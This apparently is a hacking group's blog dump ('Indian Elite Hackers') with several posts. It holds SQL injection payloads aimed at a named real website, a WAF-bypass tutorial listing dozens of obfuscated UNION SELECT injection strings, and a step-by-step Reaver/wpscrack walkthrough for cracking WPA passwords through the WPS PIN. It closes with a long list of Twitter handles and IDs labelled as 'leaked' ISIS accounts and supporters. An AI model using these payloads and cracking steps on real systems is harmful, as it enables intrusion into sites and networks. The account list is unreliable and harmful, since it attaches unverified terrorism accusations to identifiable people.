☆¸.•*☆ ☆*•.¸☆
DB_NAME()
@@database
database()
id=vv()
# like #
www.marinaplast.com/page.php?
id=-13 union select 1,2,DB_NAME
(),4,5 --
www.marinaplast.com/page.php?id=vv
()
☆¸.•*☆ ☆*•.¸☆
@@user
user()
user_name()
system_user()
# like #
www.marinaplast.com/page.php?
id=-13 union select 1,2,user
(),4,5 --
☆¸.•*☆ ☆*•.¸☆
HOST_NAME()
@@hostname
@@servername
SERVERPROPERTY()
# like #
www.marinaplast.com/page.php?
id=-13 union select 1,2,HOST_NAME
(),4,5 --
☆¸.•*☆ ☆*•.¸☆
@@datadir
datadir()
# like #
www.marinaplast.com/page.php?
id=-13 union select 1,2,datadir(),4,5 --
☆¸.•*☆ ☆*•.¸☆
ASPX
and 1=0/@@version
' and 1 =0 /@@ version;--
) and 1 =@@version--
and 1 = 0 /user ;--


©Indian Elite Hackers

WAF BYPASSING IN SQL INJECTIONS

18:52 ---

Hello!
readers

Today I share a tutorial on

WAF Byassing In SQL Injections

What is WAF ?
WAF stands for Web Application Firewall. It is
widely used nowadays to detect and defend
SQL Injections and Cross Site Scripting (XSS)
attacks.

How does it Work?
When WAF detects any malicious input from
end user, It gives 403 Forbidden, 406 Not
Acceptable or any Kind of Custom errors

How to bypass this things?

what to do next? we cant do our further
injection right?

Well its time to use various techniques to
bypass thing.
Some of these techniques are
mentioned below:

# Case Changing:

Most of the Waf's only filter lowercase or
higher-case keywords. We can easily evade
that kind of wafs by using alternate case.

if union select is forbidden , we can always try
UNION SELECT instead. And if both does not
work, We can try our luck with using mixture
of both. like UniOn seLeCt

# Using Comments

It is the most famous method to bypass WAF .

SQL comments really help us in many cases.

They play their important role in killing some
Waf's Restrictions. e.g

// , -- , --+ , #, -- -

# Inline Comments

Some WAF’s filter keywords like

/union\sselect/ig

We can bypass these filters by
using inline comments most of the time

http://localhost/waf.php?id=1 /*!union*/ /*!
select*/ 1,2,3--

Read SQLi Errors carefully. Sometimes
they left error from which we can have idea
that how waf is working on this site.
Anyways, We were talking about Filtered
Keywords. So it does not mean that waf is
only filtering union select. It may be filtering
all SQL keywords like table_name, column_name etc
So might need to apply these inline comments
on those keywords as well.

Example

http://localhost/waf.php?id=1 /*!union*/ /*!
select*/ 1,2,/*!table_name*/,4,5 /*!from*/ /*!
information_schema.tables*/ /*!where*/ /*!
table_schema*/=database()--

# Double use of Keywords

Sometimes WAF removes whole keyword from
the query and execute it and throw errors
In such cases, we can use keywords in this
way

http://localhost/waf.php?id=1 UNunionION
SELselectECT 1,2,3,4,5,6--

Anyways It totally depends upon the scenario.
Im just giving a common Idea. Rest is upon
you that how you use it.

# Using Different types of Whitespaces

Sometime Waf may be filtering the whitespace

we are using between keywords. We mostly
use Spaces But space is not the only
whitespace we can use in SQL injection. We
have some other options as well
for example
+ . %20

is use for space, but we can try using one
of these whitespaces . some examples are

%09
%0A %0B %0C %0D %A0

inurl:
union%0Bselect%0B1,2,3--

# Encoding

We can always try our luck with URL encode
thing to bypass WAF. For example we can use

union select 1,/*!table_name*/,3 from
information_schema.tables where table_
schema=database()

as

union%20select%201,%2f%2a%21table_name
%2a%2f,3%20from%20information_
schema.tables%20where%20table_schema%
3Ddatabase%28%29

but sometime waf filter also filter % itself. So
we have to use double URL encoding in that
case

union%2520select%25201,%2f%2a%21table_name%2a%2f%2520,3 from%2520information_schema.tables%2520where%2520table_schema%253Ddatabase%2528%2529

# Unexpected Input

This scenario is very rare that we have to use
buffer overflow or give unexpected query /
request to trick WAF filters.
for example:

http://localhost/waf.php?id=1 and (select 1)=
(Select
0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA)
union select 1,2,3,4,5--

This thing only worked once for me. But
knowledge is Power, may be you face any
scenario that can be bypassed by using buffer
overflow

# use all above mentioned techniques together

oh!!! .... tried all those things but still its showing
NOT ACCEPTABLE or FORBIDDEN.

well its
time to use all these above mentioned
techniques combined.

For example: you can use alternative cases
with inline comments or obfuscation.

#Some Common Union Select Solutions:

%55nion(%53elect 1,2,3)-- -
+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
+#uNiOn+#sEleCt
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/*!%55NiOn*/ /*!%53eLEct*/
/*!u%6eion*/ /*!se%6cect*/
+un/**/ion+se/**/lect
uni%0bon+se%0blect
%2f**%2funion%2f**%2fselect
union%23foo*%2F*bar%0D%0Aselect%23foo%
0D%0A
REVERSE(noinu)+REVERSE(tceles)
/*--*/union/*--*/select/*--*/
union (/*!/**/ SeleCT */ 1,2,3)
/*!union*/+/*!select*/
union+/*!select*/
/**/union/**/select/**/
/**/uNIon/**/sEleCt/**/
/**//*!union*//**//*!select*//**/
/*!uNIOn*/ /*!SelECt*/
+union+distinct+select+
+union+distinctROW+select+
uNiOn aLl sElEcT

I hope you have enjoyed this article.
Next Time We Share Some More Tutorials on WAF bypassing.

Please
give us your feedback. So that we may be able
to make things more clear for you next time .

#Indian_Elite_Hackers

How to Hack WPA WiFi Passwords by Cracking the WPS PIN Of Wi-Fi Routers

03:52 ---

How to Hack WPA
WiFi Passwords by
Cracking the WPS PIN

Hello Readers
today i am sharing this tutorial
How to Hack WPA
WiFi Passwords by
Cracking the WPS PIN Of Wi-Fi Routers

WPS, or WiFi Protected Setup,
known about for over a year by TNS, was
finally exploited with proof of concept code.
Both TNS, the discoverers of the exploit and
Stefan at .braindump have created their
respective "reaver" and "wpscrack" programs
to exploit the WPS vulnerability. From this
exploit, the WPA password can be recovered
almost instantly in plain-text once the attack
on the access point WPS is initiated, which
normally takes 2-10 hours (depending on
which program you use).

let's go over how to use both
tools to crack WPS. As of yet, no router is safe
from this attack, and yet none of the vendors
have reacted and released firmware with
mitigations in place. Even disabling WPS still
allows this attack on most routers.

Requirements

•Linux OS

•A router at home with WPS

•The following programs installed (install by
package name): aircrack-ng, python-
pycryptopp, python-scapy, libpcap-dev

Tools

Reaver 
(support for all routers)

wpscrack
(faster, but only support for major
router brands)

Crack WPS

code:
bold is a terminal command.

Follow the guide that corresponds to the tool
that you chose to use below.

Reaver

1. Unzip Reaver.

unzip reaver-1.3.tar.gz

2. Change to the Reaver directory.

cd reaver-1.3

3. Configure, compile and install the application.

./configure && make && sudo make install

4. Scan for an access point to attack, and copy

its MAC address for later
(XX:XX:XX:XX:XX:XX).

sudo iwlist scan wlan0

5. Set your device into monitor mode.

sudo airmon-ng start wlan0

6. Run the tool against an access point.

reaver -i mon0 -b <MA:CA:DD:RE:SS:XX> -vv

7. Wait until it finishes.
This tool makes it too easy.

--------------------------------------------------------------------------
wpscrack .py

1. Make the program an executable.

chmod +x wpscrack.py

2. Scan for an access point to attack, and copy
its MAC address for later
(XX:XX:XX:XX:XX:XX).

sudo iwlist scan wlan0

3. Get your MAC address, save it for later.

ip link show wlan0 | awk '/ether/{print $2}'

4. Set your device into monitor mode.

sudo airmon-ng start wlan0

5. Attack your AP.

wpscrack.py –iface mon0 –client <your MAC,
because you're attacking yourself, right?> –
bssid <AP MAC address> --ssid <name of your
AP> -v

6. Got Victory!!!!!

Now, let's hope we see a lot of firmware
update action going on in the near future, or
else a lot of places are in a whole world of
trouble.

Thanx For Reading.

----------------------
| Like Us On Facebook |
----------------------
#Indian_Elite_Hackers

Leaked ISIS ACCOUNTS BY TEAM IEH

06:34 ---

--—-- ISIS accounts --—--

https://twitter.com/True__IS             https://twitter.com/intent/user?user_id=3011776612              4276 followers
https://twitter.com/Moussa_Muslim             https://twitter.com/intent/user?user_id=2300109950              509 followers
https://twitter.com/011Hooriia             https://twitter.com/intent/user?user_id=2997233022              1496 followers
https://twitter.com/SDawwod             https://twitter.com/intent/user?user_id=2993639945              78 followers
https://twitter.com/Asd18179             https://twitter.com/intent/user?user_id=2864900614              3364 followers
https://twitter.com/saifalislam713             https://twitter.com/intent/user?user_id=3003345668              1428 followers
https://twitter.com/Ahlamm__2             https://twitter.com/intent/user?user_id=2545764356              4879 followers
https://twitter.com/namoawen32             https://twitter.com/intent/user?user_id=2986799516              1084 followers
https://twitter.com/seekingjannah3             https://twitter.com/intent/user?user_id=3009580835              626 followers
https://twitter.com/AboOhebe             https://twitter.com/intent/user?user_id=2850804181              448 followers
https://twitter.com/binjuher2             https://twitter.com/intent/user?user_id=2946379167              7312 followers
https://twitter.com/ABOU_SENAN44             https://twitter.com/intent/user?user_id=2982390766              4155 followers
https://twitter.com/1985Salieh             https://twitter.com/intent/user?user_id=2988181792              140 followers
https://twitter.com/alihal1             https://twitter.com/intent/user?user_id=413848702              256 followers
https://twitter.com/saerr3dd             https://twitter.com/intent/user?user_id=3002257824              2286 followers
https://twitter.com/SalahNews5             https://twitter.com/intent/user?user_id=2991445706              6067 followers
https://twitter.com/dawlawi113             https://twitter.com/intent/user?user_id=2902619242              380 followers
https://twitter.com/_a_r_i_1             https://twitter.com/intent/user?user_id=3009528772              391 followers
https://twitter.com/moslima_ritel             https://twitter.com/intent/user?user_id=2888950502              1271 followers
https://twitter.com/hadoula001             https://twitter.com/intent/user?user_id=2932767867              629 followers
https://twitter.com/Asd18179             https://twitter.com/intent/user?user_id=2864900614              3364 followers
https://twitter.com/bnbn50053             https://twitter.com/intent/user?user_id=2829001896              430 followers
https://twitter.com/hamamhamam1983             https://twitter.com/intent/user?user_id=2844010096              315 followers
https://twitter.com/abu_taha4             https://twitter.com/intent/user?user_id=2991862208              1050 followers
https://twitter.com/al_tafeeli             https://twitter.com/intent/user?user_id=2987980762              279 followers
https://twitter.com/1234567Zeee             https://twitter.com/intent/user?user_id=3006568330              151 followers
https://twitter.com/93luok1             https://twitter.com/intent/user?user_id=3007014931              181 followers
https://twitter.com/__iSDw             https://twitter.com/intent/user?user_id=2815039226              1463 followers
https://twitter.com/aporh_2             https://twitter.com/intent/user?user_id=409176971              1203 followers
https://twitter.com/a_nsaransar             https://twitter.com/intent/user?user_id=3010028440              302 followers
https://twitter.com/liverFan68             https://twitter.com/intent/user?user_id=3008088335              313 followers
https://twitter.com/A_N_S_AR             https://twitter.com/intent/user?user_id=3009831309              1455 followers
https://twitter.com/naseer_ps             https://twitter.com/intent/user?user_id=2836001552              3656 followers
https://twitter.com/Ak47_Karim             https://twitter.com/intent/user?user_id=2793693635              10770 followers
https://twitter.com/hagabydo             https://twitter.com/intent/user?user_id=2849861549              2695 followers
https://twitter.com/abusayf4             https://twitter.com/intent/user?user_id=2990737018              249 followers
https://twitter.com/msh_alblqawy             https://twitter.com/intent/user?user_id=2927364404              5636 followers
https://twitter.com/IslamicTiger             https://twitter.com/intent/user?user_id=2829234157              2736 followers
https://twitter.com/EbuDerdaKurdiii             https://twitter.com/intent/user?user_id=1605904339              2775 followers
https://twitter.com/fantom_f22             https://twitter.com/intent/user?user_id=2747941463              2736 followers
https://twitter.com/alkurdestany1             https://twitter.com/intent/user?user_id=2943602580              3093 followers
https://twitter.com/ALanbar_IS2             https://twitter.com/intent/user?user_id=3000974431              900 followers
https://twitter.com/fantom_f22             https://twitter.com/intent/user?user_id=2747941463              2736 followers
https://twitter.com/garibalgmou2             https://twitter.com/intent/user?user_id=2762846529              2321 followers
https://twitter.com/fisfisso             https://twitter.com/intent/user?user_id=2188171801              9261 followers
https://twitter.com/aslamy1234             https://twitter.com/intent/user?user_id=2520202962              3305 followers
https://twitter.com/Ta_ra19             https://twitter.com/intent/user?user_id=2751941711              2012 followers

** ISIS accounts and supporters **

https://twitter.com/AbuDujana484             https://twitter.com/intent/user?user_id=2897565756              1713 followers
https://twitter.com/birdofgreen             https://twitter.com/intent/user?user_id=2827006337              431 followers
https://twitter.com/Sh_BGHDD             https://twitter.com/intent/user?user_id=2978192080              2312 followers<- posting pictures/videos of burned pilot
https://twitter.com/islamcal35             https://twitter.com/intent/user?user_id=3003241999              55 followers <- telling others who to follow and who to block
https://twitter.com/basam7878             https://twitter.com/intent/user?user_id=3001174262              228 followers <- telling others who to follow
https://twitter.com/fisfisso             https://twitter.com/intent/user?user_id=2188171801              7762 followers<- posting pictures/videos of burned pilot
https://twitter.com/jazrawi_r             https://twitter.com/intent/user?user_id=2922583800              985 followers<- posting pictures/videos of burned pilot
https://twitter.com/OMYALHANEN9             https://twitter.com/intent/user?user_id=3003002180              3552 followers<- posting pictures/videos of burned pilot
https://twitter.com/bre8_             https://twitter.com/intent/user?user_id=782752790              773 followers<- posting pictures/videos of burned pilot
https://twitter.com/IbnAmghar19             https://twitter.com/intent/user?user_id=3013501300              325 followers <- telling others who to follow
https://twitter.com/E3D4M2             https://twitter.com/intent/user?user_id=2952213022              3820 followers <- posting pictures/videos of burned pilot
https://twitter.com/baraa__isis             https://twitter.com/intent/user?user_id=2962699902              1747 followers  <- posting pictures/videos of burned pilot
https://twitter.com/Moha_thagfy1             https://twitter.com/intent/user?user_id=477509530              740 followers <- posting pictures/videos of burned pilot
https://twitter.com/muslema91             https://twitter.com/intent/user?user_id=2821605855              2217 followers <- posting pictures/videos of burned pilot
https://twitter.com/seraj3qlk3             https://twitter.com/intent/user?user_id=2999843019              602 followers <- tweets about hacks (following @3bdullla)
https://twitter.com/IsllamiCstate             https://twitter.com/intent/user?user_id=1438852652              6058 followers <= Important, and in french
https://twitter.com/85f2624622af4a0             https://twitter.com/intent/user?user_id=2539317023              94 followers // Special Account. Abdullah of Cyberkov, retweet.
https://twitter.com/xc___250             https://twitter.com/intent/user?user_id=2480876290              10243 followers <= More than 10, 200 followers
https://twitter.com/yyew987             https://twitter.com/intent/user?user_id=2967792592              4054 followers
https://twitter.com/om_3akeka3             https://twitter.com/intent/user?user_id=2974907885              1072 followers
https://twitter.com/mmmsaad81             https://twitter.com/intent/user?user_id=979889209              226 followers
https://twitter.com/fGtfuOhJyYgpyS8             https://twitter.com/intent/user?user_id=2943811194              163 followers
https://twitter.com/abusamii3             https://twitter.com/intent/user?user_id=2987904017              6963 followers
https://twitter.com/Hafeda_44             https://twitter.com/intent/user?user_id=636515777              3926 followers
https://twitter.com/qahtan_njd4             https://twitter.com/intent/user?user_id=2910900212              933 followers
https://twitter.com/samibenali2013             https://twitter.com/intent/user?user_id=2853370689              195 followers
https://twitter.com/aamna1409             https://twitter.com/intent/user?user_id=3000528817              40 followers
https://twitter.com/HuthyfaAl             https://twitter.com/intent/user?user_id=2895906372              979 followers
https://twitter.com/jundkhalifa7             https://twitter.com/intent/user?user_id=3003914374              301 followers
https://twitter.com/kaled_kalil             https://twitter.com/intent/user?user_id=2861399901              154 followers
https://twitter.com/nozhatalmushtak             https://twitter.com/intent/user?user_id=3001635960              118 followers
https://twitter.com/azez266             https://twitter.com/intent/user?user_id=2827636468              1396 followers
https://twitter.com/alneeser20155             https://twitter.com/intent/user?user_id=2968689755              98 followers
https://twitter.com/FhhgYoooou29             https://twitter.com/intent/user?user_id=2966581006              614 followers
https://twitter.com/Ashraf1985Www             https://twitter.com/intent/user?user_id=3002780880              83 followers
https://twitter.com/IslamCSS             https://twitter.com/intent/user?user_id=2703187094              172 followers
https://twitter.com/1434Is             https://twitter.com/intent/user?user_id=2992365110              579 followers
https://twitter.com/wxcqsd007             https://twitter.com/intent/user?user_id=2960756067              261 followers
https://twitter.com/daim_khlafh             https://twitter.com/intent/user?user_id=2999572538              301 followers
https://twitter.com/mounaser1             https://twitter.com/intent/user?user_id=3004501072              253 followers
https://twitter.com/kss4413             https://twitter.com/intent/user?user_id=2758064260              120 followers
https://twitter.com/murabitshami2             https://twitter.com/intent/user?user_id=3008320338              11 followers
https://twitter.com/eyn_alnsr             https://twitter.com/intent/user?user_id=3002980544              380 followers
https://twitter.com/alkiaad461             https://twitter.com/intent/user?user_id=2994587605              667 followers
https://twitter.com/fahadebrhim             https://twitter.com/intent/user?user_id=362853637              326 followers
https://twitter.com/shmmrisis             https://twitter.com/intent/user?user_id=2911058234              975 followers
https://twitter.com/victory_isis             https://twitter.com/intent/user?user_id=3012243993              169 followers
https://twitter.com/mn212121             https://twitter.com/intent/user?user_id=3004155129              4015 followers
https://twitter.com/jadihadi             https://twitter.com/intent/user?user_id=2900925433              1252 followers
https://twitter.com/naser_alsone             https://twitter.com/intent/user?user_id=3002182046              1094 followers
https://twitter.com/babyloony55             https://twitter.com/intent/user?user_id=3014173803              17 followers
https://twitter.com/as0_ollla             https://twitter.com/intent/user?user_id=3013805967              235 followers
https://twitter.com/FSm7an             https://twitter.com/intent/user?user_id=636922662              31 followers
https://twitter.com/ahmad_shdi             https://twitter.com/intent/user?user_id=2745624551              72 followers
https://twitter.com/S0maLiaN_SnipeR             https://twitter.com/intent/user?user_id=2988937058              524 followers
https://twitter.com/kartal123123123             https://twitter.com/intent/user?user_id=2984816002              56 followers
https://twitter.com/ExeLeyo             https://twitter.com/intent/user?user_id=2481417354              92 followers
https://twitter.com/__A1_____             https://twitter.com/intent/user?user_id=2794091832              1016 followers
https://twitter.com/sa141417             https://twitter.com/intent/user?user_id=1853042959              1286 followers
https://twitter.com/cvbgy33             https://twitter.com/intent/user?user_id=2994806720              1183 followers
https://twitter.com/KASER_ALGAED             https://twitter.com/intent/user?user_id=243592907              1463 followers
https://twitter.com/samasm_11             https://twitter.com/intent/user?user_id=2997169488              13 followers
https://twitter.com/touiti1470             https://twitter.com/intent/user?user_id=243548924              257 followers
https://twitter.com/vip_saod             https://twitter.com/intent/user?user_id=964495069              947 followers
https://twitter.com/mfrejjdeet             https://twitter.com/intent/user?user_id=2999167926              362 followers
https://twitter.com/Hema412             https://twitter.com/intent/user?user_id=849134670              436 followers
https://twitter.com/engmas_engmas4             https://twitter.com/intent/user?user_id=3007110791              129 followers
https://twitter.com/abu0baker7             https://twitter.com/intent/user?user_id=3004651140              1864 followers
https://twitter.com/BKC5002             https://twitter.com/intent/user?user_id=2924257942              997 followers
https://twitter.com/omidgabary             https://twitter.com/intent/user?user_id=2915095407              69 followers
https://twitter.com/Abumusabzarqawi             https://twitter.com/intent/user?user_id=2987854061              119 followers
https://twitter.com/yameentaj2009_4             https://twitter.com/intent/user?user_id=3011890107              113 followers
https://twitter.com/fah00963222             https://twitter.com/intent/user?user_id=2944169276              373 followers
https://twitter.com/7rh50             https://twitter.com/intent/user?user_id=2721884725              1281 followers
https://twitter.com/ch04153567             https://twitter.com/intent/user?user_id=3001519225              476 followers
https://twitter.com/123456_mujahid             https://twitter.com/intent/user?user_id=3006229043              78 followers
https://twitter.com/musab_isis1             https://twitter.com/intent/user?user_id=2805954119              430 followers
https://twitter.com/Islamic_Khlafa             https://twitter.com/intent/user?user_id=3011322045              5 followers
https://twitter.com/RimaTati22             https://twitter.com/intent/user?user_id=2949726377              1456 followers
https://twitter.com/twasswarti             https://twitter.com/intent/user?user_id=2970115119              2068 followers
https://twitter.com/Alizaki306             https://twitter.com/intent/user?user_id=2467479128              1522 followers
https://twitter.com/alialobaide2             https://twitter.com/intent/user?user_id=2961520483              445 followers
https://twitter.com/almohajiroon             https://twitter.com/intent/user?user_id=3000953052              68 followers
https://twitter.com/michoc1990             https://twitter.com/intent/user?user_id=2598873439              112 followers
https://twitter.com/120_mmll             https://twitter.com/intent/user?user_id=2836252441              2354 followers
https://twitter.com/AR19862             https://twitter.com/intent/user?user_id=3001046270              722 followers
https://twitter.com/ahmad2015yahoo1             https://twitter.com/intent/user?user_id=3001933508              431 followers
https://twitter.com/ISIQ_SH             https://twitter.com/intent/user?user_id=3002992705              356 followers
https://twitter.com/sa87_as             https://twitter.com/intent/user?user_id=3003740474              362 followers
https://twitter.com/2tmeem_             https://twitter.com/intent/user?user_id=474870932              256 followers
https://twitter.com/5Hayatel             https://twitter.com/intent/user?user_id=2840690795              150 followers
https://twitter.com/nouraaa449             https://twitter.com/intent/user?user_id=2909868105              25 followers
https://twitter.com/abohafs_masry             https://twitter.com/intent/user?user_id=2999271594              318 followers
https://twitter.com/a0hjkkl             https://twitter.com/intent/user?user_id=2986186627              237 followers
https://twitter.com/lfpvfpe             https://twitter.com/intent/user?user_id=2887654382              637 followers
https://twitter.com/nnss192             https://twitter.com/intent/user?user_id=2846866959              219 followers
https://twitter.com/FalconEye123             https://twitter.com/intent/user?user_id=2995971643              105 followers
https://twitter.com/4_shammar             https://twitter.com/intent/user?user_id=3002620016              219 followers
https://twitter.com/omisisar             https://twitter.com/intent/user?user_id=2998474082              603 followers
https://twitter.com/AAlbadriy             https://twitter.com/intent/user?user_id=3006013415              35 followers
https://twitter.com/huseen23             https://twitter.com/intent/user?user_id=489171855              87 followers
https://twitter.com/aliisis20             https://twitter.com/intent/user?user_id=2748639635              267 followers
https://twitter.com/abohafzhgaze4             https://twitter.com/intent/user?user_id=2840522772              1836 followers
https://twitter.com/Jzrawiah213             https://twitter.com/intent/user?user_id=3002588142              142 followers
https://twitter.com/aboujihad27             https://twitter.com/intent/user?user_id=2833967866              363 followers
https://twitter.com/985Meme             https://twitter.com/intent/user?user_id=1140781962              388 followers
https://twitter.com/waadalakhrah41             https://twitter.com/intent/user?user_id=2908675184              504 followers
https://twitter.com/omar_khodor24             https://twitter.com/intent/user?user_id=2943250075              98 followers
https://twitter.com/Abuhamzau12             https://twitter.com/intent/user?user_id=2752934396              168 followers
https://twitter.com/ss_aa89             https://twitter.com/intent/user?user_id=2827199480              404 followers
https://twitter.com/Mooooooo2015             https://twitter.com/intent/user?user_id=3002919653              594 followers
https://twitter.com/jnooonalatfah             https://twitter.com/intent/user?user_id=944353291              1172 followers
https://twitter.com/a79739352             https://twitter.com/intent/user?user_id=3003601077              507 followers
https://twitter.com/kosama803             https://twitter.com/intent/user?user_id=3002368610              375 followers
https://twitter.com/Ferdaos_80             https://twitter.com/intent/user?user_id=410153945              104 followers
https://twitter.com/Is2003Khald             https://twitter.com/intent/user?user_id=2565141043              1009 followers
https://twitter.com/Islam_Lions             https://twitter.com/intent/user?user_id=2945734400              1857 followers
https://twitter.com/amjed9a             https://twitter.com/intent/user?user_id=2787838273              2553 followers
https://twitter.com/mddd_2011             https://twitter.com/intent/user?user_id=1435111093              253 followers
https://twitter.com/l_malek_zhaymr             https://twitter.com/intent/user?user_id=2887857189              7677 followers
https://twitter.com/nadoch6             https://twitter.com/intent/user?user_id=1626564318              532 followers
https://twitter.com/gsaan200907             https://twitter.com/intent/user?user_id=2999330599              647 followers
https://twitter.com/pharma_l             https://twitter.com/intent/user?user_id=2972035621              560 followers
https://twitter.com/alssareem             https://twitter.com/intent/user?user_id=606358261              1184 followers
https://twitter.com/abomsaab077             https://twitter.com/intent/user?user_id=2727581699              368 followers
https://twitter.com/5_dawla             https://twitter.com/intent/user?user_id=3013123773              79 followers
https://twitter.com/rebazzharaway             https://twitter.com/intent/user?user_id=3008323082              5 followers
https://twitter.com/abouhaamzaa             https://twitter.com/intent/user?user_id=2979107853              15 followers
https://twitter.com/turjomankhilafa             https://twitter.com/intent/user?user_id=3014410618              13 followers
https://twitter.com/asdalshm             https://twitter.com/intent/user?user_id=2996282573              271 followers
https://twitter.com/simran0076             https://twitter.com/intent/user?user_id=2982126022              718 followers
https://twitter.com/steven00754807             https://twitter.com/intent/user?user_id=2368593951              4126 followers
https://twitter.com/Fatahmamo1             https://twitter.com/intent/user?user_id=2989720330              3663 followers
https://twitter.com/BKH_83             https://twitter.com/intent/user?user_id=2657968788              184 followers
https://twitter.com/tk7619lC80yU82A             https://twitter.com/intent/user?user_id=2950220095              2400 followers
https://twitter.com/Sniper99990             https://twitter.com/intent/user?user_id=2960098196              5098 followers
https://twitter.com/__SaJeN__             https://twitter.com/intent/user?user_id=3003568439              682 followers
https://twitter.com/Alsdafiee1             https://twitter.com/intent/user?user_id=2516597022              2381 followers
https://twitter.com/mowaheda3             https://twitter.com/intent/user?user_id=2820107899              2408 followers
https://twitter.com/sawah200420002             https://twitter.com/intent/user?user_id=3009734080              174 followers
https://twitter.com/qlm_sakhr             https://twitter.com/intent/user?user_id=2307024168              4825 followers
https://twitter.com/alrihaal             https://twitter.com/intent/user?user_id=234806229              123 followers
https://twitter.com/puuqugmailcom1             https://twitter.com/intent/user?user_id=2986169985              35 followers
https://twitter.com/th_b_at15             https://twitter.com/intent/user?user_id=2763537826              1160 followers
https://twitter.com/vip3dnan             https://twitter.com/intent/user?user_id=2978719298              300 followers
https://twitter.com/MoslemTrabelsi             https://twitter.com/intent/user?user_id=1645105524              4138 followers
https://twitter.com/woolf2017             https://twitter.com/intent/user?user_id=3007282584              72 followers
https://twitter.com/ebn3ggabb             https://twitter.com/intent/user?user_id=2793452289              335 followers
https://twitter.com/__IS__84             https://twitter.com/intent/user?user_id=2971541928              467 followers
https://twitter.com/hstawy3             https://twitter.com/intent/user?user_id=2983045712              6174 followers
https://twitter.com/abisa3d_d             https://twitter.com/intent/user?user_id=2899610776              1380 followers
https://twitter.com/hadjer_2             https://twitter.com/intent/user?user_id=3010260995              100 followers
https://twitter.com/gasseem3             https://twitter.com/intent/user?user_id=2951025940              85 followers
https://twitter.com/zamnlftohaat             https://twitter.com/intent/user?user_id=2532577430              537 followers
https://twitter.com/m111m14             https://twitter.com/intent/user?user_id=2797179192              49 followers
https://twitter.com/stopss28             https://twitter.com/intent/user?user_id=2936806683              190 followers
https://twitter.com/mohdzuhairy779             https://twitter.com/intent/user?user_id=2989548825              4384 followers
https://twitter.com/ddd37dc22ea74ba             https://twitter.com/intent/user?user_id=2999872682              177 followers
https://twitter.com/3in1000000             https://twitter.com/intent/user?user_id=3007774992              96 followers
https://twitter.com/DgutSgg             https://twitter.com/intent/user?user_id=3008334834              5 followers
https://twitter.com/othman406abou             https://twitter.com/intent/user?user_id=2947499499              14 followers
https://twitter.com/yso0o33             https://twitter.com/intent/user?user_id=2287180543              294 followers
https://twitter.com/el_yolcuu             https://twitter.com/intent/user?user_id=3006967951              105 followers
https://twitter.com/alkarebis             https://twitter.com/intent/user?user_id=3007213382              454 followers
https://twitter.com/doolaawy             https://twitter.com/intent/user?user_id=3007710462              68 followers
https://twitter.com/msaknm1             https://twitter.com/intent/user?user_id=2999778717              372 followers
https://twitter.com/ebu_yasir1             https://twitter.com/intent/user?user_id=3004195323              183 followers
https://twitter.com/wonter12348             https://twitter.com/intent/user?user_id=2534877413              229 followers
https://twitter.com/omyakout5             https://twitter.com/intent/user?user_id=3008419133              68 followers
https://twitter.com/abou_zined_tn             https://twitter.com/intent/user?user_id=2429199714              400 followers
https://twitter.com/hadil1235             https://twitter.com/intent/user?user_id=2479651452              400 followers
https://twitter.com/isis_abass             https://twitter.com/intent/user?user_id=3004179437              526 followers
https://twitter.com/abumaridrisi2             https://twitter.com/intent/user?user_id=3001722215              580 followers
https://twitter.com/aliahmed_27             https://twitter.com/intent/user?user_id=2867495092              106 followers
https://twitter.com/aboabdulla20141             https://twitter.com/intent/user?user_id=3005598174              221 followers
https://twitter.com/dawela_is             https://twitter.com/intent/user?user_id=2282332260              56 followers
https://twitter.com/albalushibss             https://twitter.com/intent/user?user_id=2313168643              214 followers
https://twitter.com/ee_m77771             https://twitter.com/intent/user?user_id=3007042429              1497 followers
https://twitter.com/WWordee1             https://twitter.com/intent/user?user_id=3001192508              719 followers
https://twitter.com/ka1_66             https://twitter.com/intent/user?user_id=2990279028              136 followers
https://twitter.com/AsawirtiIS             https://twitter.com/intent/user?user_id=3008743989              8251 followers
https://twitter.com/Daulat_islam1             https://twitter.com/intent/user?user_id=3005955914              266 followers
https://twitter.com/Aligrira7Ali             https://twitter.com/intent/user?user_id=1066772730              540 followers
https://twitter.com/jihadalani19973             https://twitter.com/intent/user?user_id=2965743981              57 followers
https://twitter.com/HomadoMe             https://twitter.com/intent/user?user_id=3000322363              150 followers
https://twitter.com/Ep1Cs             https://twitter.com/intent/user?user_id=3006103087              382 followers <- one of their "hackers"
https://twitter.com/announce_block             https://twitter.com/intent/user?user_id=3006816110              7 followers <-- blocklist to block "trolls"
https://twitter.com/rttt1d             https://twitter.com/intent/user?user_id=3001856598              27 followers
https://twitter.com/Umm_Stranger             https://twitter.com/intent/user?user_id=3005363712              641 followers
https://twitter.com/DAI_Block_List             https://twitter.com/intent/user?user_id=2991722153              41 followers
https://twitter.com/AlAmrikWitness2             https://twitter.com/intent/user?user_id=3008538773              619 followers
https://twitter.com/sandstormjihadi             https://twitter.com/intent/user?user_id=3006373754              176 followers
https://twitter.com/Abu_MohammedMS             https://twitter.com/intent/user?user_id=2977815250              364 followers
https://twitter.com/hfbjfjyahoocom1             https://twitter.com/intent/user?user_id=3009960813              32 followers
https://twitter.com/AlkindyyIslamic             https://twitter.com/intent/user?user_id=2993078690              4445 followers
https://twitter.com/HaqqvsBaatil2             https://twitter.com/intent/user?user_id=2908430518              180 followers
https://twitter.com/UmmNusaybah_             https://twitter.com/intent/user?user_id=2917088729              269 followers
https://twitter.com/Bin_Juba             https://twitter.com/intent/user?user_id=2988545458              1201 followers
https://twitter.com/account_dawla             https://twitter.com/intent/user?user_id=3010887952              33 followers
https://twitter.com/mouna_58             https://twitter.com/intent/user?user_id=2337797252              1911 followers
https://twitter.com/tigre_doux             https://twitter.com/intent/user?user_id=2911739224              1587 followers
https://twitter.com/amirmoum             https://twitter.com/intent/user?user_id=2905078936              469 followers
https://twitter.com/Lolololo_9393             https://twitter.com/intent/user?user_id=3000683107              742 followers
https://twitter.com/ryryryry1000             https://twitter.com/intent/user?user_id=2473247180              442 followers
https://twitter.com/Dabieq             https://twitter.com/intent/user?user_id=3003650831              712 followers
https://twitter.com/harb2020jed             https://twitter.com/intent/user?user_id=1460667343              1097 followers
https://twitter.com/alamany3934             https://twitter.com/intent/user?user_id=1242668383              1272 followers
https://twitter.com/nanaalifdl3             https://twitter.com/intent/user?user_id=3004787887              16 followers
